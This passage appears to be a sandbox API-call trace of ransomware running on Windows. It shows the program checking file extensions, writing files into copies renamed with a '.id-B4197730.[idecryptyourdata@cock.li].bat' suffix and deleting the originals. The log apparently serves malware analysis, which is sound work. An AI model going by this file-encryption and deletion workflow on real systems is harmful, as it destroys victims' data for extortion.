lstrlenW (lpString=".docx") returned 5 [0202.205] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.205] lstrlenW (lpString=".pdf") returned 4 [0202.205] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString=".xls") returned 4 [0202.205] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString=".xlsx") returned 5 [0202.205] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.205] lstrlenW (lpString=".ppt") returned 4 [0202.205] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString=".zip") returned 4 [0202.205] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString=".rar") returned 4 [0202.205] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString=".bz2") returned 4 [0202.205] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString=".7z") returned 3 [0202.205] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.205] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString=".dbf") returned 4 [0202.205] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString=".1cd") returned 4 [0202.205] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.205] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString=".jpg") returned 4 [0202.205] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.205] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.205] lstrlenW (lpString="messages_ja.properties") returned 22 [0202.206] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0202.206] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=6349) returned 1 [0202.206] CloseHandle (hObject=0x338) returned 1 [0202.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties")) returned 0x20 [0202.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.206] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0202.206] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.206] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.206] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0202.207] GetLastError () returned 0x0 [0202.207] ReadFile (hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0) Thread: id = 96 os_tid = 0xc4c [0178.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3cb0978 [0178.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3cc0980 [0178.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddf88 [0178.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c1b0 [0178.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddfa0 [0178.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x415e020 [0178.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddfb8 [0178.089] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddfb8, Size=0x20) returned 0x6beea8 [0178.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddfb8 [0178.089] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddfb8, Size=0x20) returned 0x6bef48 [0178.089] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.090] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.090] Wow64DisableWow64FsRedirection (in: OldValue=0x375ff50 | out: OldValue=0x375ff50*=0x0) returned 1 [0178.090] lstrlenW (lpString="kernel32.dll") returned 12 [0178.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.090] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.090] Sleep (dwMilliseconds=0x64) [0178.334] Sleep (dwMilliseconds=0x64) [0178.675] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.675] lstrlenW (lpString="api-ms-win-crt-math-l1-1-0.dll") returned 30 [0178.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.675] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=27840) returned 1 [0178.675] CloseHandle (hObject=0x350) returned 1 [0178.675] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 0x20 [0178.675] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.676] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.676] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0178.676] GetLastError () returned 0x0 [0178.677] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x6cc0, lpOverlapped=0x0) returned 1 [0178.700] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x6cd0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x6cd0, lpOverlapped=0x0) returned 1 [0178.702] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0178.702] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x110, lpOverlapped=0x0) returned 1 [0178.703] SetEndOfFile (hFile=0x354) returned 1 [0178.703] CloseHandle (hObject=0x354) returned 1 [0178.703] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.703] SetEndOfFile (hFile=0x350) returned 1 [0178.704] CloseHandle (hObject=0x350) returned 1 [0178.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.705] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 1 [0178.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.705] lstrlenW (lpString=".doc") returned 4 [0178.705] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString=".docx") returned 5 [0178.706] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.706] lstrlenW (lpString=".pdf") returned 4 [0178.706] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString=".xls") returned 4 [0178.706] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString=".xlsx") returned 5 [0178.706] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.706] lstrlenW (lpString=".ppt") returned 4 [0178.706] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.706] lstrlenW (lpString=".zip") returned 4 [0178.706] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString=".rar") returned 4 [0178.706] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.706] lstrlenW (lpString=".bz2") returned 4 [0178.706] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.706] lstrlenW (lpString=".7z") returned 3 [0178.706] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.706] lstrlenW (lpString=".dbf") returned 4 [0178.706] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.706] lstrlenW (lpString=".1cd") returned 4 [0178.706] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.707] lstrlenW (lpString=".jpg") returned 4 [0178.707] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.707] lstrlenW (lpString=".doc") returned 4 [0178.707] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString=".docx") returned 5 [0178.707] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.707] lstrlenW (lpString=".pdf") returned 4 [0178.707] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString=".xls") returned 4 [0178.707] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString=".xlsx") returned 5 [0178.707] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.707] lstrlenW (lpString=".ppt") returned 4 [0178.707] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.707] lstrlenW (lpString=".zip") returned 4 [0178.707] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString=".rar") returned 4 [0178.707] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.707] lstrlenW (lpString=".bz2") returned 4 [0178.708] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.708] lstrlenW (lpString=".7z") returned 3 [0178.708] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.708] lstrlenW (lpString=".dbf") returned 4 [0178.708] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.708] lstrlenW (lpString=".1cd") returned 4 [0178.708] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 88 [0178.708] lstrlenW (lpString=".jpg") returned 4 [0178.708] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.708] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.708] lstrlenW (lpString="api-ms-win-crt-private-l1-1-0.dll") returned 33 [0178.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.709] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=70848) returned 1 [0178.709] CloseHandle (hObject=0x350) returned 1 [0178.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 0x20 [0178.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.709] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.710] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0178.710] GetLastError () returned 0x0 [0178.710] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x114c0, lpOverlapped=0x0) returned 1 [0178.725] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x114d0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x114d0, lpOverlapped=0x0) returned 1 [0178.727] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0178.727] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x116, lpOverlapped=0x0) returned 1 [0178.727] SetEndOfFile (hFile=0x354) returned 1 [0178.728] CloseHandle (hObject=0x354) returned 1 [0178.728] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.728] SetEndOfFile (hFile=0x350) returned 1 [0178.729] CloseHandle (hObject=0x350) returned 1 [0178.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.730] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 1 [0178.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.730] lstrlenW (lpString=".doc") returned 4 [0178.730] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.730] lstrlenW (lpString=".docx") returned 5 [0178.730] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.730] lstrlenW (lpString=".pdf") returned 4 [0178.730] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.730] lstrlenW (lpString=".xls") returned 4 [0178.730] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.730] lstrlenW (lpString=".xlsx") returned 5 [0178.730] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.730] lstrlenW (lpString=".ppt") returned 4 [0178.730] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.730] lstrlenW (lpString=".zip") returned 4 [0178.730] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".rar") returned 4 [0178.731] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".bz2") returned 4 [0178.731] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.731] lstrlenW (lpString=".7z") returned 3 [0178.731] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString=".dbf") returned 4 [0178.731] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString=".1cd") returned 4 [0178.731] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString=".jpg") returned 4 [0178.731] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString=".doc") returned 4 [0178.731] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".docx") returned 5 [0178.731] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.731] lstrlenW (lpString=".pdf") returned 4 [0178.731] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".xls") returned 4 [0178.731] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".xlsx") returned 5 [0178.731] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.731] lstrlenW (lpString=".ppt") returned 4 [0178.731] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.731] lstrlenW (lpString=".zip") returned 4 [0178.731] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".rar") returned 4 [0178.731] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.731] lstrlenW (lpString=".bz2") returned 4 [0178.732] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.732] lstrlenW (lpString=".7z") returned 3 [0178.732] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.732] lstrlenW (lpString=".dbf") returned 4 [0178.732] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.732] lstrlenW (lpString=".1cd") returned 4 [0178.732] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 91 [0178.732] lstrlenW (lpString=".jpg") returned 4 [0178.732] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.732] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.732] lstrlenW (lpString="api-ms-win-crt-runtime-l1-1-0.dll") returned 33 [0178.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.732] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=23232) returned 1 [0178.732] CloseHandle (hObject=0x350) returned 1 [0178.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x20 [0178.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0178.733] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.733] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0178.733] GetLastError () returned 0x0 